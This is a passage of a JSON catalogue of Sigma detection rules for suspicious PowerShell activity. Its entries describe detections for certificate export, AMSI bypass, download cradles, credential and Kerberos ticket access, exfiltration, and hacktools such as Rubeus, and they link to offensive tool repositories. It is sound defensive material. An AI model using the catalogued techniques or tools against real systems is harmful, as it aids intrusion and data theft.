], "filename": "posh_ps_export_certificate.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/powershell/module/pki/export-pfxcertificate?view=windowsserver2022-ps", "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-112a", "https://www.splunk.com/en_us/blog/security/breaking-the-chain-defending-against-certificate-services-abuse.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_export_certificate.yml" ], "tags": [ "attack.credential-access", "attack.t1552.004" ] }, "related": [ { "dest-uuid": "60b508a1-6a5e-46b1-821a-9f7b78752abf", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "aa7a3fce-bef5-4311-9cc1-5f04bb8c308c", "value": "Certificate Exported Via PowerShell - ScriptBlock" }, { "description": "Detects usage of the powerShell Set-Mailbox Cmdlet to set-up an SMTP forwarding rule.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-10-26", "falsepositive": [ "Legitimate usage of the cmdlet to forward emails" ], "filename": "posh_ps_exchange_mailbox_smpt_forwarding_rule.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_exchange_mailbox_smpt_forwarding_rule.yml" ], "tags": [ "attack.exfiltration" ] }, "uuid": "15b7abbb-8b40-4d01-9ee2-b51994b1d474", "value": "Suspicious PowerShell Mailbox SMTP Forward Rule" }, { "description": "Adversaries may create a domain account to maintain access to victim systems.\nDomain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain..\n", "meta": { 
"author": "frack113", "creation_date": "2021-12-28", "falsepositive": [ "Legitimate administrative script" ], "filename": "posh_ps_directoryservices_accountmanagement.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1136.002/T1136.002.md#atomic-test-3---create-a-new-domain-account-using-powershell", "https://learn.microsoft.com/en-us/dotnet/api/system.directoryservices.accountmanagement?view=net-8.0", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_directoryservices_accountmanagement.yml" ], "tags": [ "attack.persistence", "attack.t1136.002" ] }, "related": [ { "dest-uuid": "7610cada-1499-41a4-b3dd-46467b68d177", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b29a93fb-087c-4b5b-a84d-ee3309e69d08", "value": "Manipulation of User Computer or Group Security Principals Across AD" }, { "description": "Detects usage of special strings/null bits in order to potentially bypass AMSI functionalities", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-01-04", "falsepositive": [ "Unknown" ], "filename": "posh_ps_amsi_null_bits_bypass.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/r00t-3xp10it/hacking-material-books/blob/43cb1e1932c16ff1f58b755bc9ab6b096046853f/obfuscation/simple_obfuscation.md#amsi-bypass-using-null-bits-satoshi", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_amsi_null_bits_bypass.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": 
"fa2559c8-1197-471d-9cdd-05a0273d4522", "value": "Potential AMSI Bypass Script Using NULL Bits" }, { "description": "Detects suspicious PowerShell download command", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2017-03-05", "falsepositive": [ "PowerShell scripts that download content from the Internet" ], "filename": "posh_ps_susp_download.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/dotnet/api/system.net.webclient.downloadfile?view=net-8.0", "https://learn.microsoft.com/en-us/dotnet/api/system.net.webclient.downloadstring?view=net-8.0", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_download.yml" ], "tags": [ "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "403c2cc0-7f6b-4925-9423-bfa573bed7eb", "value": "Suspicious PowerShell Download - Powershell Script" }, { "description": "Detects usage of the \"Write-EventLog\" cmdlet with 'RawData' flag. The cmdlet can be levreage to write malicious payloads to the EventLog and then retrieve them later for later use", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-16", "falsepositive": [ "Legitimate applications writing events via this cmdlet. 
Investigate alerts to determine if the action is benign" ], "filename": "posh_ps_susp_write_eventlog.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://www.blackhillsinfosec.com/windows-event-logs-for-red-teams/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_write_eventlog.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "35f41cd7-c98e-469f-8a02-ec4ba0cc7a7e", "value": "PowerShell Write-EventLog Usage" }, { "description": "Detects PowerShell scripts that set the ACL of a file or a folder", "meta": { "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-07-18", "falsepositive": [ "Unknown" ], "filename": "posh_ps_set_acl.yml", "level": "low", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/74438b0237d141ee9c99747976447dc884cb1a39/atomics/T1505.005/T1505.005.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_set_acl.yml" ], "tags": [ "attack.defense-evasion", "attack.t1222" ] }, "related": [ { "dest-uuid": "65917ae0-b854-4139-83fe-bf2441cf0196", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "cae80281-ef23-44c5-873b-fd48d2666f49", "value": "PowerShell Script Change Permission Via Set-Acl - PsScript" }, { "description": "Detects all variations of obfuscated PowerShell IEX invocation code generated by the Invoke-Obfuscation framework from the following code block \u2014", "meta": { "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", "creation_date": "2019-11-08", "falsepositive": [ "Unknown" ], "filename": "posh_ps_invoke_obfuscation_obfuscated_iex.yml", "level": "high", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ 
"https://github.com/danielbohannon/Invoke-Obfuscation/blob/f20e7f843edd0a3a7716736e9eddfa423395dd26/Out-ObfuscatedStringCommand.ps1#L873-L888", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_obfuscated_iex.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1b9dc62e-6e9e-42a3-8990-94d7a10007f7", "value": "Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell" }, { "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks", "meta": { "author": "Sean Metcalf, Florian Roth, Bartlomiej Czyz @bczyz1, oscd.community, Nasreddine Bencherchali, Tim Shelton, Mustafa Kaan Demir, Georg Lauenstein, Max Altgelt, Tobias Michalski, Austin Songer", "creation_date": "2017-03-05", "falsepositive": [ "Unknown" ], "filename": "posh_ps_malicious_commandlets.yml", "level": "high", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/", "https://github.com/adrecon/ADRecon", "https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1", "https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html", "https://github.com/samratashok/nishang", "https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries", "https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1", "https://github.com/adrecon/AzureADRecon", 
"https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/", "https://github.com/besimorhino/powercat", "https://github.com/HarmJ0y/DAMP", "https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1", "https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1", "https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1", "https://adsecurity.org/?p=2921", "https://github.com/DarkCoderSc/PowerRunAsSystem/", "https://github.com/calebstewart/CVE-2021-1675", "https://github.com/Kevin-Robertson/Powermad", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_malicious_commandlets.yml" ], "tags": [ "attack.execution", "attack.discovery", "attack.t1482", "attack.t1087", "attack.t1087.001", "attack.t1087.002", "attack.t1069.001", "attack.t1069.002", "attack.t1069", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "767dbf9e-df3f-45cb-8998-4903ab5f80c0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "25659dd6-ea12-45c4-97e6-381e3e4b593e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "21875073-b0ee-49e3-9077-1e2a885359af", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "a01bf75f-00b2-4568-a58f-565ff9bf202b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "2aed01ad-3df3-4410-a8cb-11ea4ded587c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": 
"15dbf668-795c-41e6-8219-f0447c0e64ce", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "89819aa4-bbd6-46bc-88ec-c7f7fe30efa6", "value": "Malicious PowerShell Commandlets - ScriptBlock" }, { "description": "Detetcts PowerShell activity in which Get-Addefaultdomainpasswordpolicy is used to get the default password policy for an Active Directory domain.", "meta": { "author": "frack113", "creation_date": "2022-03-17", "falsepositive": [ "Legitimate PowerShell scripts" ], "filename": "posh_ps_susp_get_addefaultdomainpasswordpolicy.yml", "level": "low", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/powershell/module/activedirectory/get-addefaultdomainpasswordpolicy?view=windowsserver2022-ps", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1201/T1201.md#atomic-test-9---enumerate-active-directory-password-policy-with-get-addefaultdomainpasswordpolicy", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_get_addefaultdomainpasswordpolicy.yml" ], "tags": [ "attack.discovery", "attack.t1201" ] }, "related": [ { "dest-uuid": "b6075259-dba3-44e9-87c7-e954f37ec0d5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "bbb9495b-58fc-4016-b9df-9a3a1b67ca82", "value": "Password Policy Discovery With Get-AdDefaultDomainPasswordPolicy" }, { "description": "Adversaries may use hidden windows to conceal malicious activity from the plain sight of users.\nIn some cases, windows that would typically be displayed when an application carries out an operation can be hidden\n", "meta": { "author": "frack113, Tim Shelton (fp AWS)", "creation_date": 
"2021-10-20", "falsepositive": [ "Unknown" ], "filename": "posh_ps_susp_windowstyle.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.003/T1564.003.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_windowstyle.yml" ], "tags": [ "attack.defense-evasion", "attack.t1564.003" ] }, "related": [ { "dest-uuid": "cbb66055-0325-4111-aca0-40547b6ad5b0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "313fbb0a-a341-4682-848d-6d6f8c4fab7c", "value": "Suspicious PowerShell WindowStyle Option" }, { "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", "meta": { "author": "Nikita Nazarov, oscd.community", "creation_date": "2020-10-08", "falsepositive": [ "Unknown" ], "filename": "posh_ps_invoke_obfuscation_via_use_mhsta.yml", "level": "high", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/SigmaHQ/sigma/issues/1009", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_use_mhsta.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e55a5195-4724-480e-a77e-3ebe64bd3759", "value": "Invoke-Obfuscation Via Use MSHTA - PowerShell" }, { "description": "Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with 
existing traffic.\nCommands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.\n", "meta": { "author": "frack113", "creation_date": "2022-01-23", "falsepositive": [ "Unknown" ], "filename": "posh_ps_susp_invoke_webrequest_useragent.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1071.001/T1071.001.md#t1071001---web-protocols", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_invoke_webrequest_useragent.yml" ], "tags": [ "attack.command-and-control", "attack.t1071.001" ] }, "related": [ { "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d4488827-73af-4f8d-9244-7b7662ef046e", "value": "Change User Agents with WebRequest" }, { "description": "Detects PowerShell scripts that make use of the \"Compress-Archive\" Cmdlet in order to compress folders and files where the output is stored in a potentially suspicious location that is used often by malware for exfiltration.\nAn adversary might compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), frack113", "creation_date": "2021-07-20", "falsepositive": [ "Unknown" ], "filename": "posh_ps_susp_zip_compress.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1074.001/T1074.001.md", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_zip_compress.yml" ], "tags": [ "attack.collection", "attack.t1074.001" ] }, "related": [ { "dest-uuid": "1c34f7aa-9341-4a48-bfab-af22e51aca6c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b7a3c9a3-09ea-4934-8864-6a32cacd98d9", "value": "Zip A Folder With PowerShell For Staging In Temp - PowerShell Script" }, { "description": "Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation.\nScreen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations\n", "meta": { "author": "frack113", "creation_date": "2021-12-28", "falsepositive": [ "Unknown" ], "filename": "posh_ps_capture_screenshots.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md#atomic-test-6---windows-screen-capture-copyfromscreen", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_capture_screenshots.yml" ], "tags": [ "attack.collection", "attack.t1113" ] }, "related": [ { "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d4a11f63-2390-411c-9adf-d791fd152830", "value": "Windows Screen Capture with CopyFromScreen" }, { "description": "Detects execution of ADRecon.ps1 for AD reconnaissance which has been reported to be actively used by FIN7", "meta": { "author": "Bhabesh Raj", "creation_date": "2021-07-16", "falsepositive": [ "Unknown" ], "filename": "posh_ps_adrecon_execution.yml", "level": "high", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ 
"https://github.com/sense-of-security/ADRecon/blob/11881a24e9c8b207f31b56846809ce1fb189bcc9/ADRecon.ps1", "https://bi-zone.medium.com/from-pentest-to-apt-attack-cybercriminal-group-fin7-disguises-its-malware-as-an-ethical-hackers-c23c9a75e319", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_adrecon_execution.yml" ], "tags": [ "attack.discovery", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "bf72941a-cba0-41ea-b18c-9aca3925690d", "value": "PowerShell ADRecon Execution" }, { "description": "Detects usage of COM objects that can be abused to download files in PowerShell by CLSID", "meta": { "author": "frack113", "creation_date": "2022-12-25", "falsepositive": [ "Legitimate use of the library" ], "filename": "posh_ps_download_com_cradles.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=57", "https://learn.microsoft.com/en-us/dotnet/api/system.type.gettypefromclsid?view=net-7.0", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_download_com_cradles.yml" ], "tags": [ "attack.command-and-control", "attack.t1105" ] }, "related": [ { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "3c7d1587-3b13-439f-9941-7d14313dbdfe", "value": "Potential COM Objects Download Cradles Usage - PS Script" }, { "description": "Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.", "meta": { "author": "oscd.community, @redcanary, Zach Stanford @svch0st", "creation_date": "2020-10-10", "falsepositive": [ 
"Help Desk or IT may need to manually add a corporate Root CA on occasion. Need to test if GPO push doesn't trigger FP" ], "filename": "posh_ps_root_certificate_installed.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_root_certificate_installed.yml" ], "tags": [ "attack.defense-evasion", "attack.t1553.004" ] }, "related": [ { "dest-uuid": "c615231b-f253-4f58-9d47-d5b4cbdb6839", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "42821614-9264-4761-acfc-5772c3286f76", "value": "Root Certificate Installed - PowerShell" }, { "description": "Detects attempts of decoding a base64 Gzip archive in a PowerShell script. This technique is often used as a method to load malicious content into memory afterward.", "meta": { "author": "frack113", "creation_date": "2022-12-23", "falsepositive": [ "Legitimate administrative script" ], "filename": "posh_ps_frombase64string_archive.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=43", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_frombase64string_archive.yml" ], "tags": [ "attack.command-and-control", "attack.t1132.001" ] }, "related": [ { "dest-uuid": "04fd5427-79c7-44ea-ae13-11b24778ff1c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "df69cb1d-b891-4cd9-90c7-d617d90100ce", "value": "Suspicious FromBase64String Usage On Gzip Archive - Ps Script" }, { "description": "Detects usage of the \"Get-AdGroup\" cmdlet to enumerate Groups within Active Directory", "meta": 
{ "author": "frack113", "creation_date": "2022-03-17", "falsepositive": [ "Unknown" ], "filename": "posh_ps_get_adgroup.yml", "level": "low", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_get_adgroup.yml" ], "tags": [ "attack.discovery", "attack.t1069.002" ] }, "related": [ { "dest-uuid": "2aed01ad-3df3-4410-a8cb-11ea4ded587c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "8c3a6607-b7dc-4f0d-a646-ef38c00b76ee", "value": "Active Directory Group Enumeration With Get-AdGroup" }, { "description": "utilize native PowerShell Identity modules to query the domain to extract the Service Principal Names for a single computer.\nThis behavior is typically used during a kerberos or silver ticket attack.\nA successful execution will output the SPNs for the endpoint in question.\n", "meta": { "author": "frack113", "creation_date": "2021-12-28", "falsepositive": [ "Unknown" ], "filename": "posh_ps_request_kerberos_ticket.yml", "level": "high", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1558.003/T1558.003.md#atomic-test-4---request-a-single-ticket-via-powershell", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_request_kerberos_ticket.yml" ], "tags": [ "attack.credential-access", "attack.t1558.003" ] }, "related": [ { "dest-uuid": "f2877f7f-9a4c-4251-879f-1224e3006bee", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a861d835-af37-4930-bcd6-5b178bfb54df", "value": "Request A Single Ticket via PowerShell" }, { "description": 
"Detects Commandlet names from ShellIntel exploitation scripts.", "meta": { "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", "creation_date": "2021-08-09", "falsepositive": [ "Unknown" ], "filename": "posh_ps_shellintel_malicious_commandlets.yml", "level": "high", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/Shellntel/scripts/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_shellintel_malicious_commandlets.yml" ], "tags": [ "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "402e1e1d-ad59-47b6-bf80-1ee44985b3a7", "value": "Malicious ShellIntel PowerShell Commandlets" }, { "description": "Detects potential exfiltration attempt via audio file using PowerShell", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-01-16", "falsepositive": [ "Unknown" ], "filename": "posh_ps_audio_exfiltration.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/gtworek/PSBits/blob/e97cbbb173b31cbc4d37244d3412de0a114dacfb/NoDLP/bin2wav.ps1", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_audio_exfiltration.yml" ], "tags": [ "attack.exfiltration" ] }, "uuid": "e4f93c99-396f-47c8-bb0f-201b1fa69034", "value": "Potential Data Exfiltration Via Audio File" }, { "description": "Adversaries may manipulate accounts to maintain access to victim systems.\nAccount manipulation may consist of any action that preserves adversary access to a compromised account, such as modifying credentials or permission groups\n", "meta": { "author": "frack113", "creation_date": "2021-12-28", "falsepositive": [ "Legitimate administrative script" ], "filename": 
"posh_ps_localuser.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1098/T1098.md#atomic-test-1---admin-account-manipulate", "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.localaccounts/?view=powershell-5.1", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_localuser.yml" ], "tags": [ "attack.persistence", "attack.t1098" ] }, "related": [ { "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4fdc44df-bfe9-4fcc-b041-68f5a2d3031c", "value": "Powershell LocalAccount Manipulation" }, { "description": "Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system.", "meta": { "author": "frack113", "creation_date": "2021-08-23", "falsepositive": [ "Admin script" ], "filename": "posh_ps_susp_win32_pnpentity.yml", "level": "low", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1120/T1120.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_win32_pnpentity.yml" ], "tags": [ "attack.discovery", "attack.t1120" ] }, "related": [ { "dest-uuid": "348f1eef-964b-4eb6-bb53-69b3dcb0c643", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b26647de-4feb-4283-af6b-6117661283c5", "value": "Powershell Suspicious Win32_PnPEntity" }, { "description": "Detects the use of PowerShell to identify the current logged user.", "meta": { "author": "frack113", "creation_date": "2022-04-04", "falsepositive": [ "Legitimate PowerShell scripts" ], "filename": 
"posh_ps_susp_get_current_user.yml", "level": "low", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1033/T1033.md#atomic-test-4---user-discovery-with-env-vars-powershell-script", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1033/T1033.md#atomic-test-5---getcurrent-user-with-powershell-script", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_get_current_user.yml" ], "tags": [ "attack.discovery", "attack.t1033" ] }, "related": [ { "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4096a49c-7de4-4da0-a230-c66ccd56ea5a", "value": "Suspicious PowerShell Get Current User" }, { "description": "Detects the execution of the hacktool Rubeus using specific command line flags", "meta": { "author": "Christian Burkard (Nextron Systems), Florian Roth (Nextron Systems)", "creation_date": "2023-04-27", "falsepositive": [ "Unlikely" ], "filename": "posh_ps_hktl_rubeus.yml", "level": "high", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://blog.harmj0y.net/redteaming/from-kekeo-to-rubeus", "https://github.com/GhostPack/Rubeus", "https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_hktl_rubeus.yml" ], "tags": [ "attack.credential-access", "attack.t1003", "attack.t1558.003", "attack.lateral-movement", "attack.t1550.003" ] }, "related": [ { "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f2877f7f-9a4c-4251-879f-1224e3006bee", "tags": [ 
